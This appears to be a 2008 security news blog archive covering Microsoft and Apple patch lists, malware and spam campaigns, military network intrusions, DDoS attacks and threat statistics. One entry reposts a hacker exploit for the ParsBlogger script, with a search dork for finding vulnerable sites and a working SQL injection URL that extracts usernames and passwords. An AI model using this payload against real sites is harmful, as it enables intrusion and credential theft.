Microsoft released today patches for at least 28 vulnerabilities affecting Windows, Office, Internet Explorer, Visual Basic Active Controls and Windows Media Player. According to a warning from security researchers, malicious hackers are exploiting an unpatched zero-day flaw in Microsoft’s Internet Explorer 7 browser to launch a new wave of malware attacks.
Of the 28 flaws, 23 could be used to launch remote code execution attacks with minimal user action. Most of the bulletins address client-side flaws that could be exploited via the browser or if a user opens a booby-trapped file, a rigged RTF (Rich Text Format) Word file for example.
Here are the details and overview of the December 2008 Microsoft patches:
MS08-070 (Critical) Multiple vulnerabilities in activeX controls from visual basic 6.0’s runtime allow random code execution. Also affects Visual studio, Foxpro, Frontpage, and MS Project. The vulnerable files are distributed with 3rd party applications as well. Affected: Visual Basic Active X (CVE-2008-3704, CVE-2008-4252, CVE-2008-4256, CVE-2008-4253, CVE-2008-4254, CVE-2008-4255). CVE-2008-3704 Exploit code publicly available since August 2008.
MS08-071 (Critical) Multiple overflow vulnerabilities allow code execution with the rights of the logged on user via crafted WMF files. Replaces MS08-021. Affected: GDI (CVE-2008-3465, CVE-2008-2249) No publicly known exploits.
MS08-072 (Critical) A multitude of vulnerabilities allow random code execution in office (and via extension Outlook). Also affects the mac versions of office (Office 2004 and Office 2008). Replaces MS08-026, MS08-042, MS08-052 and MS08-057. Affected: MS Word (CVE-2008-4024, CVE-2008-4025, CVE-2008-4026, CVE-2008-4027, CVE-2008-4028, CVE-2008-4030, CVE-2008-4837, CVE-2008-4031). No publicly known exploits.
MS08-073 (Critical) Multiple vulnerabilities allow random code execution with the rights of the logged on user. Replaces MS08-058. Affected: MS Internet Explorer (CVE-2008-4258, CVE-2008-4259, CVE-2008-4261, CVE-2008-4260). No publicly known exploits.
MS08-074 (Critical) Multiple vulnerabilities allo allow random code execution in MS Office. Also affects the mac versions of office (Office 2004 and Office 2008). Replaces MS08-058. Affected: Excel (CVE-2008-4265, CVE-2008-4264, CVE-2008-4266) No publicly known exploits.
MS08-075 (Critical) Multiple vulnerabilities allow random code execution with the rights of the logged on user. Replaces MS08-038. Affected:Windows explorer (CVE-2008-4269, CVE-2008-4268). No publicly known exploits.
MS08-076 (Important) Multiple vulnerabilities allow random code execution with the rights of the logged-on user. Affected: WMC media player (CVE-2008-3010, CVE-2008-3009). No publicly known exploits.
MS08-077 (Important) Bypassing authentication is possible on sharepoint servers. Replaces MS07-059. Affected: Sharepoint (CVE-2008-4032). Microsoft’s workaround publicizes more details in here.
Users running IE 7 on Windows XP SP2 can still be infected by a Trojan downloader that exploits unpatched IE7 vulnerability. The exploit was published the same day Microsoft patched a wide range of vulnerabilities mentioned above. The bug exploits the way IE handles XML (Extensible Markup Language). For the attack to work, a victim must first visit a Web site that serves the malicious JavaScript code that takes advantage of the flaw.
In attacks, the code drops a malicious program on the victim’s PC which then goes to download malicious software from various locations. Currently there is public proof-of-concept code and the attacks may become more widespread (some hacked Chinese-language websites already infect visitors).
10.12.08
Unpatched Internet Explorer 7 Vulnerability Exploited As Microsoft Patch Fixes 28 Security Vulnerabilities
7.12.08
Login And Password Stealing Trojan Masquerades As Firefox Plug-in
It drops an executable file (which is a Firefox 3 add-on) and a JavaScript file (detected by Bitdefender as Trojan.PWS.ChromeInject.A) into the Firefox plugins and chrome folders respectively. It filters the URLs within the Mozilla Firefox browser and whenever encounter the specific addresses opened in the Firefox browser it captures the login credentials. It is the first malware that targets Firefox. The filtering is done by a JavaScript file running in Firefox’s chrome environment.
The backdoor code looks for data exchanged between a compromised machine and a list of pre-programmed banking sites in Europe, Australia and the US. Harvested login credentials are captured and subsequently posted to a server located in Russia.
BitDefender reports that incidents of the malware are “very low”, so the attack is more notable for its novelty than its potency. Malware that capitalises on the popularity of Firefox is rare, but not unprecedented.
4.12.08
Military US Base Systems In Afghanistan And Iraq Hit By A Virus, At Least One Classified Network Penetrated
Defense officials would not describe the extent of damage inflicted on military networks. But they said that the attack struck hard at networks within U.S. Central Command, the headquarters that oversees U.S. involvement in Iraq and Afghanistan, and affected computers in combat zones. The attack also penetrated at least one highly protected classified network.
Military computers are regularly beset by outside hackers, computer viruses and worms. But defense officials said the most recent attack involved an intrusive piece of malicious software, or “malware,” apparently designed specifically to target military networks. The invasive software, known as agent.btz, has circulated among nongovernmental U.S. computers for months. But only recently has it affected the Pentagon’s networks. It is not clear whether the version responsible for the cyber-intrusion of classified networks is the same as the one affecting other computer systems.
The malware is able to spread to any flash drive plugged into an infected computer. The risk of spreading the malware to other networks prompted the military to ban the drives.
Although officials are withholding many details, the attack underscores the increasing danger and potential significance of computer warfare, which defense experts say could one day be used by combatants to undermine even a militarily superior adversary.
Military electronics experts have not pinpointed the source or motive of the attack and could not say whether the destructive program was created by an individual hacker or whether the Russian government may have had some involvement. Defense experts may never be able to answer such questions, officials said.
Suspicions of Russian involvement come at an especially delicate time because of sagging relations between Washington and Moscow and growing tension over U.S. plans to develop a missile defense system in Eastern Europe. The two governments also have traded charges of regional meddling after U.S. support for democratic elections in former Soviet states and recent Russian overtures in Latin America.
The offending program has been cleansed from a number of military networks. But officials said they did not believe they had removed every bit of infection from all Defense Department computers.
29.11.08
Malware attacks decline from the US, but increase from China, Russia and Korea
Thirty-five percent of all Internet intrusion attacks are coming from Korea, according to Network Box. Analysis of all Internet threats in November by the company shows that Korea accounts for more than double the intrusions of its nearest competitor, the US (14 per cent).Spam and viruses are on the decline from the US, following the shutdown of the McColo spam hosting service earlier this month. Although over the full month, the US was the biggest source of spam and viruses, this dropped sharply towards the end of November, when China took the top spot in the spam charts.
Top Ten Viruses
Threat Name Daily Average %
1. spam.phish.url 35.67821
2. can-2003-0161 14.69491
3. trojan-spy.html.fraud.gen 5.30703
4.trojan-dropper.win32.agent.yzp 4.05881
5.nbh-bscript 3.16169
6.spam.porn.spam_nb_porn_subj_csk_1 2.50091
7.nbh-multext 2.35456
8. policy_prohibits_'exe'_nested_at 1.79322
9.Trojan-psw.win32.agent.lcc 1.78064
10. clm.html.phishing.pay-36 1.31201
Top Ten Trojans
Threat Name Daily Average %
1. trojan-spy.html.fraud.gen 0.11455
2. trojan-dropper.win32.agent.yzp 0.09805
3. trojan-psw.win32.agent.lcc 0.05511
4. trojan-spy.win32.zbot.fql 0.03281
5. trojan-spy.win32.zbot.frh 0.02655
6. clm.trojan.agent-61609 0.01474
7. trojan.win32.agent.amzt 0.01355
8. trojan-downloader.win32.small.afzf 0.00847
9. trojan-spy.win32.zbot.ghq 0.00711
10. trojan-downloader.win32.agent.anaq 0.00636
Top Ten Intrusions
Threat Name Daily Average %
1. NETBIOS 35.61600
2. BOGON 13.72736
3. PINGFLOOD 7.14538
4. HTTP-S-WEBDAV 0.03116
5. ICMP 0.02818
6. HTTP-S-WEBDEX 0.01964
7. SOBIG-F 0.01383
8. HTTP-S-NIMDA 0.00477
9. HTTP-S-UNIXATTACK 0.00439
10. HTTP-S-IISATTACK 0.00378
Top Ten Sources of Viruses
Country Daily Average %
1. US 19.49704
2. China 6.49728
3. Korea 6.36452
4. Australia 5.46776
5. UK 4.40333
6. Ukraine 4.39740
7. Turkey 3.88654
8. Russia 3.60779
9. Brazil 3.42233
10. Spain 2.77787
Top Ten Sources of Spam
Country Daily Average %
1. US 14.43738
2. China 9.99901
3. Korea 6.67193
4. Turkey 6.31428
5. Australia 5.94338
6. UK 4.46450
7. Brazil 4.19417
8. Spain 4.10385
9. Russia 3.83448
10. Poland 2.77324
Top Ten Sources of Intrusions
Country Daily Average %
1. Korea 34.90125
2. US 15.97265
3. Hong Kong 8.88417
4. China 8.45910
5. Malaysia 5.59282
6. Australia 3.90484
7. Turkey 1.46664
8. Brazil 1.15039
9. UK 1.00705
10. Poland 0.95489
Paypal Is Being Used In Popular Nigerian 419 Scam
A new variant of popular Nigerian 419 scam is possible via Paypal, according to report by Inquirer. The 419 scam is named after the relevant section of the Nigerian Criminal Code and the premise is always the same. Somebody offers to pay money into your account and give you a cut when you send it back. In truth the whole thing is money laundering but this latest twist – using Paypal – is significant because, on the surface, it looks like there’s no catch.
Instead of receiving the offer via email (as is normally the case), this person was approached over a Skype chat session. The perpetuator wants to transfer funds out a Paypal account and convert them back into US dollars. All the victim needed to do was check his Paypal account and when the money arrived, send a significantly lower amount back via Western Union.
Due to Paypal’s payment reversal policy, there is a loophole which enables the scam to work. As the payment would be classified as ’services’ rather than goods, there would be no proof that the the victim – who becomes the ‘vendor’ – provided any goods. So the ‘buyer’ – in this case the scammer – gets the money back. In the meantime, the vendor has sent the dollars via Western Union and then finds himself stuck with no means of recourse.
Both Western Union and Paypal can be blamed for making this scam work. Western Union makes it too easy to send and receive money anonymously while Paypal’s dispute resolution procedure system is a crude automated system.
28.11.08
Parsblogger Remote SQL Injection
--------------------------------------------------------------------------------------------------------------------[~] Script : ParsBlogger[~]
Version : >!<[~] Link : http://www.parsblogger.com/[~]
Dork : "Powered by ParsBlogger"[~]
Author : BorN To K!LL[~]
TeaM : Security Geeks [ Sec-Geeks.com ]
--------------------------------------------------------------------------------------------------------------------
[~] Exploit :.site.ir/blog.asp?wr=[SQL][~]
Example :.site.ir/blog.asp?wr=-5+union+all+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13+from+writer----------------------------------------------------------------------------------------------------------------------[~] Greetings :.[ Đr ĦλCКΣΓ ] , [ SECURITY GΣΣKS ] , [ AsbMay's Group ] , [ w4ck1ng TeaM ] , [ darkc0de TeaM ] , [ Juba ] .. n all muslims--------------------------------------------------------------------------------------------------------------------
Infecting Christmas E-greetings Are Distributed Via Spam
Websense Security Labs has discovered that malware authors are already using Christmas themes this year as a social engineering tactic, in an effort to gain control over compromised machines. This campaign uses email messages in the form of e-greetings, leading to supposed animated postcards. These actually lead to a Trojan backdoor that has been distributed in previous malicious spam campaigns.
The email messages, spoofed to appear as though they have been sent from postcards.org, display an animated Christmas scene. A URL link within the email leads to a malicious file called postcard.exe hosted on various servers, including those in the .com domain space.
Once executed, a backdoor is created by the malware author enabling access and control over the resources of the compromised machine. Control is conducted over IRC, communicating with ircserver.*snip*.la. During the install process an image called xmas.jpg is displayed to the user as a distraction technique.
Example of malicious email:
Malware Infected Spam Threatens To Suspend Internet Access
Spammers are constantly using simple social engineering tactics that scare people into opening malicious files. This is definitely not a first time and it seems this method is rather successful. TrendLabs reports a new form of spam email containing a malicious file attachment that have been spreading over the Internet. This time the subject is “Your internet access is going to get suspended”. The spam email claims to come from ICS Monitoring Team telling recipients that they have to stop their illegal downloading of copyrighted material or else their Internet access will be suspended.
The spam email claims that a report of the recipient’s activities for the past six months is in the attached zipped file. Apparently, instead of the said report, the zipped file contains a malicious executable file named user-EA49943X-activities.exe.
The malicious file is currently detected as TROJ_MEREDROP.GJ by TrendLabs. It drops two files, both GOLDUN variants. This Trojans are known information stealers that monitor the Internet browsing activities of affected users. In this particular case the cyber-criminals intend to steal credentials related to the online banking site www.e-gold.com.
This is not the first time malware authors have disguised themselves as the ‘Internet police’. Trend Micro researchers already found spam which also presented users with the same ISP Consorcium spill used in the spam.
22.11.08
Top 5 free Hacking program
Netcat
Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol. It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.
Pentagon Hit by Unprecedented Cyber Attack
The attack came in the form of a global virus or worm that is spreading rapidly throughout a number of military networks.
"We have detected a global virus for which there has been alerts, and we have seen some of this on our networks," a Pentagon official told FOX News. "We are now taking steps to mitigate the virus."
The official could not reveal the source of the attack because that information remains classified.
"Daily there are millions of scans of the GIG, but for security reasons we don't discuss the number of actual intrusions or attempts, or discuss specific measures commanders in the field may be taking to protect and defend our networks," the department said in an official statement.
Military computers are often referred to as part of the Global Information Grid, or GIG, a system composed of 17 million computers, many of which house classified or sensitive information.
FOX News obtained a copy of one memo sent out last week to an Army division within the Pentagon warning of the cyber attack.
"Due to the presence of commercial malware, CDR USSTRATCOM has banned the use of removable media (thumb drives, CDRs/DVDRs, floppy disks) on all DoD networks and computers effective immediately."
12 Security Vulnerabilities Fixed In Apple iPhone OS 2.2 Update
The updates include:
CVE-2008-2321: CoreGraphics contains memory corruption issues in the processing of arguments. Passing untrusted input to CoreGraphics via an application, such as a web browser, may lead to an unexpected application termination or arbitrary code execution.
CVE-2008-2327: Multiple uninitialized memory access issues exist in libTIFF’s handling of LZW-encoded TIFF images. Viewing a maliciously crafted TIFF image may lead to an unexpected application termination or arbitrary code execution.
CVE-2008-1586: A memory exhaustion issue exists in the handling of TIFF images. Viewing a maliciously crafted TIFF image may lead to an unexpected device reset.
CVE-2008-4227: The encryption level for PPTP VPN connections may revert to a previous lower setting. This update addresses the issue by properly setting the encryption preferences.
CVE-2008-4211: An issue in Office Viewer’s handling of columns in Microsoft Excel files may result in an out-of-bounds memory access. Viewing a maliciously crafted Microsoft Excel file may lead to an unexpected application termination or arbitrary code execution.
CVE-2008-4228: iPhone provides the ability to make an emergency call when locked. Currently, an emergency call may be placed to any number. A person with physical access to an iPhone may take advantage of this feature to place arbitrary calls which are charged to the iPhone owner.
CVE-2008-4229: The Passcode Lock feature is designed to prevent applications from being launched unless the correct passcode is entered. A race condition in the handling of device settings may cause the Passcode Lock to be removed when the device is restored from backup. This may allow a person with physical access to the device to launch applications without the passcode.
CVE-2008-4230: If an SMS message arrives while the emergency call screen is visible, the entire SMS message is displayed, even if the “Show SMS Preview” preference was set to “OFF”. This update addresses the issue by, in this situation, displaying only a notification that a SMS message has arrived, and not its content.
CVE-2008-4231: A memory corruption issue exists in the handling of HTML table elements. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution.
CVE-2008-4232: Safari allows an iframe element to display content outside its boundaries, which may lead to user interface spoofing.
CVE-2008-4233: If an application is launched via Safari while a call approval dialog is shown, the call will be placed. This may allow a maliciously crafted website to initiate a phone call without user interaction. Additionally, under certain circumstances it may be possible for a maliciously crafted website to block the user’s ability to cancel dialing for a short period of time.
CVE-2008-3644: Disabling autocomplete on a form field may not prevent the data in the field from being stored in the browser page cache. This may lead to the disclosure of sensitive information to a person with physical access to an unlocked device.
There are still several known phishing and spamming flaws in iPhone that remain unfixed.
18.11.08
Website For The President Of Georgia Under Distributed Denial Of Service Attack
The server [62.168.168.9] which houses the website has been largely offline since the attack started. Passive DNS records show the system houses several other websites which are mostly unrelated to the Georgian government. However, the server does also host the Social Assistance and Employment State Agency website (www.saesa.gov.ge). This website along with the others on the host have been rendered inaccessible.
The C&C server involved in these attacks is on the IP address 207.10.234.244, which is subsequently located in the United States. Shadowserver recommends blocking and/or monitoring for traffic to this address. Currently it appears the host site for 207.10.234.244 has taken action against this system and appears to now be blocking access to it. However, the server being targeted by the C&C is still unreachable.
Recent DDoS attacks against various other neighbors of Russia to include Estonia have been quite popular in the last few years. We do not have any solid proof that the people behind this C&C server are Russian. However, the HTTP-based botnet C&C server is a MachBot controller, which is a tool that is frequently used by Russian bot herders. On top of that the domain involved with this C&C server has seemingly bogus registration information but does tie back to Russia.
Update (July 22): Georgian authorities denied this attack. According to Interfax, Georgian press center claimed that the website worked without difficulties and the reports about a DDoS attack are false.
BBC Website Hit By DDoS Attack
The attack appears to have lasted for 1 hour and 15 minutes, which is the longest time the site has been offline during the entire 2008, was also confirmed by the distributed uptime monitoring company Pingdom earlier today. During the attack, the BBC website responded very slowly, and our monitoring shows that for a total of 1 hour and 15 minutes it did not respond at all. The downtime was spread over multiple short intervals, lasting just a few minutes each time. The attack lasted the entire evening. It started to have an effect after 5 p.m. CET and the performance was not back to normal until after 10 p.m. CET. Analyzing the response times of the website clearly shows the effect the DDoS attack had on the performance of the BBC website.
With the lack of specific details regarding the DDoS attack provided by the BBC, the reason for this attack is unclear.
13.11.08
Firefox 3.0.4, Firefox 2.0.0.18 And Seamonkey 1.1.13 Released, 11 Security Vulnerabilities Patched, 4 Of Them Critical
The four critical vulnerabilities are:
MFSA 2008-55 Crash and remote code execution in nsFrameManager. A vulnerability in part of Mozilla’s DOM constructing code can be exploited by modifying certain properties of a file input element before it has finished initializing. When the blur method of the modified input element is called, uninitialized memory is accessed by the browser, resulting in a crash. This crash may be used by an attacker to run arbitrary code on a victim’s computer.
MFSA 2008-54 Buffer overflow in http-index-format parser. This is a flaw in the way Mozilla parses the http-index-format MIME type. By sending a specially crafted 200 header line in the HTTP index response, an attacker can cause the browser to crash and run arbitrary code on the victim’s computer.
MFSA 2008-53 XSS and JavaScript privilege escalation via session restore. The browser’s session restore feature can be used to violate the same-origin policy and run JavaScript in the context of another site. Any otherwise unexploitable crash can be used to force the user into the session restore state. This vulnerability could also be used by an attacker to run arbitrary JavaScript with chrome privileges.
MFSA 2008-52 Crashes with evidence of memory corruption. Mozilla developers identified and fixed several stability bugs in the browser engine used in Firefox and other Mozilla-based products. Some of these crashes showed evidence of memory corruption under certain circumstances and we presume that with enough effort at least some of these could be exploited to run arbitrary code.
The Firefox update also fixes the following issues:
MFSA 2008-58 Parsing error in E4X default namespace.
MFSA 2008-57 -moz-binding property bypasses security checks on codebase principals.
MFSA 2008-56 nsXMLHttpRequest::NotifyEventListeners() same-origin violation.
MFSA 2008-51 file: URIs inherit chrome privileges when opened from chrome.
MFSA 2008-47 Information stealing via local shortcut files.
Mozilla recommends that users who still run FF2 upgrade to FF3 as soon as possible.
11.11.08
Introducing new vulnerability scanner
QualysGuard VM enables small to large organizations to effectively manage their vulnerabilities and maintain control over their network security with centralized reports, verified remedies, and full remediation workflow capabilities with trouble tickets. QualysGuard provides comprehensive reports on vulnerabilities including severity levels, time to fix estimates and impact on business, plus trend analysis on security issues.
By continuously and proactively .
Tenable offers the Passive Vulnerability Scanner (formerly NeVO). This paper not only serves as an introduction to passive vulnerability scanning, it also includes many examples specific to the Passive Vulnerability Scanner.
Barack Obama used for a malware spam attack
Were you to click on the link you would find yourself on a website pretending to be a news site offering information and a video of Barack Obama’s historic win. However, the site tries to fool you into installing what it claims is an update to Adobe Flash to view the video.
The file referenced is detected by Sophos as a piece of malware called Mal/Behav-027. It’s likely that the cybercriminals behind this attack will rotate the malware being served up by this dangerous website - so we will continue to monitor its activity as well as block access to the infected webpage with our web protection solutions.
9.11.08
Latest Virus Description !!
Trojan-PSW.Win32.OnLineGames.sxa 29 Oct 2008 20:01:00 +030This malicious program is a Trojan. It is a Windows PE EXE file. It is 118103 bytes in size. Installation The Trojan copies its executable file to the Windows system directory: %System%\kavo.exe In order to ensure that the Trojan is launched automatically each time the system is restarted, the…
Trojan-PSW.Win32.OnLineGames.lfi 29 Oct 2008 20:00:00 +030This malicious program is a Trojan. It is a Windows PE EXE file. It is 123873 bytes in size. Installation The Trojan copies its executable file to the Windows system directory: %System%\amvo.exe In order to ensure that the Trojan is launched automatically each time the system is restarted, the…
Trojan-Downloader_Win32_Agent.nmi 29 Oct 2008 19:59:00 +030This Trojan downloads another program via the Internet and launches it on the victim machine without the user’s knowledge or consent. It is a Windows PE EXE file. The size of infected files can range from 18KB to 47KB.
Trojan-Downloader.Win32.Braidupdate.c 28 Oct 2008 15:54:00 +030This Trojan downloads another program via the Internet and launches it on the victim machine without the user’s knowledge or consent. It is a Windows PE EXE file. It is 79360 bytes in size. It is written in C++. Installation In order to ensure that the Trojan is launched automatically each…
Trojan-Downloader.JS.Agent.sg 28 Oct 2008 15:52:00 +030This Trojan downloads other files via the Internet and launches them for execution on the victim machine. It is an HTML page which contains Visual Basic Script and Java Script. It is 677 bytes in size.
Trojan-GameThief.Win32.OnLineGames.tnys 28 Oct 2008 15:48:00 +030This Trojan is designed to steal account data from the online game LineAge2. It is a Windows PE EXE file. It is 654848 bytes in size.
8.11.08
White House Network Hacked By Chinese On Multiple Occasions
Each attack cracked the unclassified network’s defenses for a short time. The classified network remained secure, according to Financial Times. The official said the Chinese cyber attacks had the hallmarks of the “grain of sands” approach taken by Chinese intelligence, which involves obtaining and pouring through lots of - often low-level - information to find a few nuggets.
“For a short period of time, they successfully breach a wall, and then you rebuild the wall … it is not as if they have continued access. It is constant cat and mouse on this stuff,” the source reportedly said.
The FT’s revelations came just days after Newsweek reported that both the Obama and McCain campaigns had been hacked from overseas, with large amounts of data downloaded, apparently in an attempt to track the candidates’ evolving policy positions. This could of course potentially help the unnamed foreign entities in future negotiations.
The campaign attacks were picked up by the authorities, with the FBI and the Secret Service notifying the Obama campaign back in August that what staffers thought was a virus was something more sinister.
“You have a problem way bigger than what you understand,” an FBI agent reportedly told Obama staff members. “You have been compromised, and a serious amount of files have been loaded off your system.”
The US has increased efforts to tackle cyber security, particularly since Chinese hackers believed to be associated with the Peoples’ Liberation Army last year perpetrated a major attack on the Pentagon.
US military computer experts battled for weeks against a sustained attack that eventually overcame the Pentagon’s defenses. The cyber attackers managed to obtain information and emails traffic from the unclassified computer system that supports Robert Gates, the defense secretary. Pentagon IT technicians were forced to take the network down for days to conduct repairs.
Concerns about Chinese hacking last year prompted President George W. Bush to tell reporters ahead of a meeting with President Hu Jintao of China that he might raise the issue with countries of concern.
Over the past year, the US government has tightened restrictions on officials using BlackBerrys and computers overseas, particularly in Russia and China, and sometimes bars them from removing the equipment from US government aircraft in the country.
In another incident, US government cyber investigators have determined that an attack this summer on the Obama and McCain campaign computer networks also originated in China. Details of the intrusion were first reported by Newsweek.
”There is no doubt that foreign governments are actively targeting cyber space not only for sensitive information but to influence our most sensitive processes such as the US presidential election,” said Sami Saydjari, head of the Cyber Defence Agency, a private company that advises government on hacking.
While the US has raised concerns about cyber attacks, many governments believe the US is also engaged in electronic spying. Bob Woodward, the veteran Washington Post reporter, this year revealed that the US had been spying on the Iraqi government.
Highly Critical Vulnerabilities In VLC Media Player
Exploitation of this issue requires the user to explicitly open a specially crafted file. As with any media player, the standard advice is to avoid from opening files from untrusted third parties or accessing untrusted remote sites.
Details:
Summary : Buffer overflows in VLC RealText and CUE demuxers
Date : November 2008
Affected versions : VLC media player 0.9.5 down to 0.5.0
ID : VideoLAN-SA-0810
CVE reference : CVE-2008-xxxx, CVE-2008-xxxx
Solution
VLC media player 0.9.6 addresses this issue. Patches for older versions are available from the official VLC source code repository 0.9-bugfix branch.
Daily Report
7.11.08
Break news
Facebook “added friend confirmation” Malicious Spam
Websense Security Labs has discovered another round of malicious Facebook messages. This campaign is another visual social-engineering spam campaign which tries to visually trick users into believing that the message is a legitimate added friend confirmation. The “From” address in the message is spoofed to make it look as if it was sent from Facebook, and the links look like they lead to Facebook.
In previous Facebook “add friend” Malicious Spam campaign, spammers included a malicious zip attachment that claimed to contain a picture, to entice the recipient to double-click on it. From a spammer’s perspective, the likelihood of attack success decreases when antivirus software picks up the attachment. If not picked up by antivirus software, then content learning technologies filter such messages and their attachments after receiving a certain volume of similar messages.
In order to maintain their attack over a longer time period with increased success rates, spammers have switched their tactics by including links to an external Web site. The use of external links in emails makes antivirus detection tougher, as not all antivirus software has the ability to scan or detect links included in email messages. Also, from a spammer’s perspective, using links consisting of compromised ‘legitimate’ domains hosting malware as a lure increases the success rate, as this is more likely to bypass security filters that rely heavily on reputation services.
Websense Security Labs sees these tactics adopted by spammers and malware authors as an ongoing trend, increasingly targeting Web 2.0 sites to carry out a wide range of attacks.
The links in the message actually lead to a malicious executable named “update.exe” (SHA1: a4dc17d1bcb191af75afedddf60aecbc2af2a37f).
This malicious executable has a very low AV detection. When run, the malicious executable steals data from its victim, establishing a connection with an IRC botnet.
Break News
According to an article published Wednesday by Newsweek, hackers broke into computer systems of both the Barack Obama and John McCain campaigns and stole a large amount of data
Officials with the FBI and the Secret Service notified Obama staffers in August of the breach after tech consultants for the campaign detected what they thought at the time was a computer virus. “You have a problem way bigger than what you understand,” an FBI agent told Obama staff members. “You have been compromised, and a serious amount of files have been loaded off your system.”
White House chief of staff Josh Bolten also weighed in, telling an Obama campaign chief: “You have a real problem…and you have to deal with it.”
Investigators told Obama aides that the McCain computer systems had been similarly compromised. A senior McCain official confirmed to Newsweek that the campaign’s network had been hacked and the FBI was investigating.
According to investigators at the FBI and the White House, a “foreign entity or organization” is believed to be behind the attacks in an attempt to “gather information on the evolution of both camps’ policy positions.” The information could prove useful in negotiations with a future administration. The investigators told the Obama team the hack wasn’t carried out by political opponents.
Representatives of both campaigns weren’t available to comment on the Newsweek report.
Cyber criminals are actively capitalizing on Barack Obama’s victory in the US presidential race. Within 12 hours of his acceptance speech Tuesday night, net users were being treated to scams involving Google AdWords and prodigious volumes of spam.
The spam comes masked as dispatches from legitimate news sources, including the BBC and CNN, and invite readers to click a link to view a video of Obama accepting his country’s vote. Those who take the bait are sent to a spoof page of the news site that claims they need to update their Adobe Flash Player before viewing the speech.
In fact, Adobe_flash9.exe installs the notorious Trojan-PSW:W32/Papras.CL, according to anti-virus provider F-Secure. Earlier Wednesday, just 14 of the 36 major anti-virus programs detected the trojan, according to an analysis from VirusTotal. Once installed, the malware, which cloaks itself in a rootkit, logs passwords for bank sites and other sensitive information and sends them to a server located in Ukraine.
The fraudulent news sites are being hosted on a fast-flux network of infected machines, according to CyberCrime & Doing Time blog. Cloudmark, a company that provides spam filtering service, has already seen more than 10 million of the spam messages, according to the Zero Day blog.
Scammers were also exploiting the now-completed presidential race using Google’s Sponsored Links. Early Wednesday, searches related to the President Elect returned paid results that included links to websites that tried to install malware on end users’ machines, The Times Online reported. The malicious ads were no longer appearing on Google at time of writing.
The barrage of Obama-themed attacks are part of a broader trend of using current events to trick people into following links that lead to attacks. The US presidential election has been a favorite source of such attacks over the past year, with the names of candidates such as John McCain, Hillary Clinton, Ron Paul and Mike Huckabee all invoked.
Old Facebook Worm Using New Ways To Spread By Abusing Google Reader And Picasa Websites
Hackers initially unleashed Koobface in late July, but Facebook’s security team soon slowed its spread by blocking the webites that were hosting the malicious Trojan software. That has prompted the criminals to change tactics. In this latest attack they have hosted files that appear to be YouTube videos on Picasa and Google Reader and used Facebook to send them to victims.
The links appear safe because they go to Google sites, but once the victim arrives on the Google Reader or Picasa page, he is invited to click on a video or a web link. The victim is then told he needs to download special codec decompression software to view the video. That software is actually a malicious Trojan Horse program, which is blocked by most anti-virus programs, according to Facebook.
It could be the cyber-criminals behind Koobface have deliberately misspelled their Facebook messages to further help them evade detection by filters. This latest attack do not use the self-copying worm code that Koobface used last August, but it could easily be added.
Koobface has been a top security concern at Facebook since July. The worm’s creators have used Facebook’s instant messaging feature and also hosted their malicious links on sites such as Tinyurl.com and Bloglines.
Security experts have long warned that the Web 2.0 mash-up model of allowing users to put together their own content from many different sources naturally creates many security problems. In part, this is because it allows anyone to post material on trustworthy domains such as Google.
Facebook is working with Google to shut down the problem, said Facebook spokesman Barry Schnitt.
24.10.08
WMplayer Vuln.
Vulnerability in Windows Media Player Could Allow Remote Code Execution (954154)
Executive Summary
This security update resolves a privately reported vulnerability in Windows Media Player that could allow remote code execution when a specially crafted audio file is streamed from a Windows Media server. If a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.
This security update is rated Critical for all supported and affected editions of Windows Media Player 11. For more information, see the subsection, Affected and Non-Affected Software, in this section.
The security update addresses the vulnerability by correcting the manner in which Windows Media Player 11 handles audio files streamed from a server-side playlist (SSPL). For more information about the vulnerability, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability entry under the next section, Vulnerability Information.
Recommendation. Microsoft recommends that customers apply the update immediately.
20.10.08
Introducing Biometric Technology
Facial biometrics is one of the fastest growing areas of biometrics. With growing technologies facial recognition can convert a photograph or a video image into a code that describes a face’s physical characterizes. This can be used to identify the common person from a distance, without intruding into their personal space.
Computer software for facial identification reads the peaks and valleys of an individual’s facial features; these peaks and valleys are known as nodal points. There are 80 nodal points in a human face, but the software needs only 15-20 to make an identification. Specialists concentrate on the golden triangle region between the temples and the lips. This area of the face remains the same even if hair and a beard is grown, weight is gained, aging occurs, or glasses are put on.
Hand Geometry Identification Technology
Viable hand geometry devices have been manufactured since the early 1980s, making hand geometry the first biometric to find widespread computerized use. It remains popular; common applications include access control and time-and-attendance operations.
Since hand geometry is not thought to be as unique as fingerprints or irises, fingerprinting and iris recognition remain the preferred technology for high-security applications. Hand geometry is very reliable when combined with other forms of identification, such as identification cards or personal identification numbers. In large populations, hand geometry is not suitable for so-called one-to-many applications, in which a user is identified from his biometric without any other identification.
DNA can be collected from any number of sources: blood, hair, finger nails, mouth swabs, blood stains, saliva, straws, and any number of other sources that has been attached to the body at some time. DNA matching has become a popular use in criminal trials, especially in proving rape cases (Landers, E., 1992). The main problems surrounding DNA biometrics is that it is not a quick process to identify someone by their DNA. The process is also a very costly one (Baird, S., 2002).
DNA Biometrics is not a fool proof method of identification. If forensic scientists to not conduct a DNA test properly, a person’s identification code can be skewed. Another problem is matching prior DNA samples to new samples; this is a bigger problem in DNA fingerprinting. The information looks like a bar code, and if not closely inspected an incorrect match could be made (SAIC, 2004).
At Georgia Tech University, professors and students are developing a system that will be able to recognize a persons gait by radar signals. This Doppler effect is 80- 95 percent effective in identifying an individual. Research Engineer Bill Marshall explains that they can decode radio signals reflecting of a person’s walking stride, as they walk toward the signal. This signal pattern is converted to an individuals audio signature, which can be catalogued for later use. Marshall is sure to include that audio signals, decoded from an individual’s gait, are not unique to a particular person. Any given number of people may have the same audio signature, but unlike the unique DNA or finger prints, gait biometrics can catalog an individual without them knowing they were ever being observed.
Gait biometrics would be particularly beneficial in identifying criminal suspects. Police could scan a large crowd for a suspect without them knowing they were on to them. Gait biometrics can also be used to identify shoplifters-particularly ‘pregnant’ women. Women pretending to be pregnant will walk differently then women who are actually pregnant. This would be a large advance in technology if introduced to common retail stores.
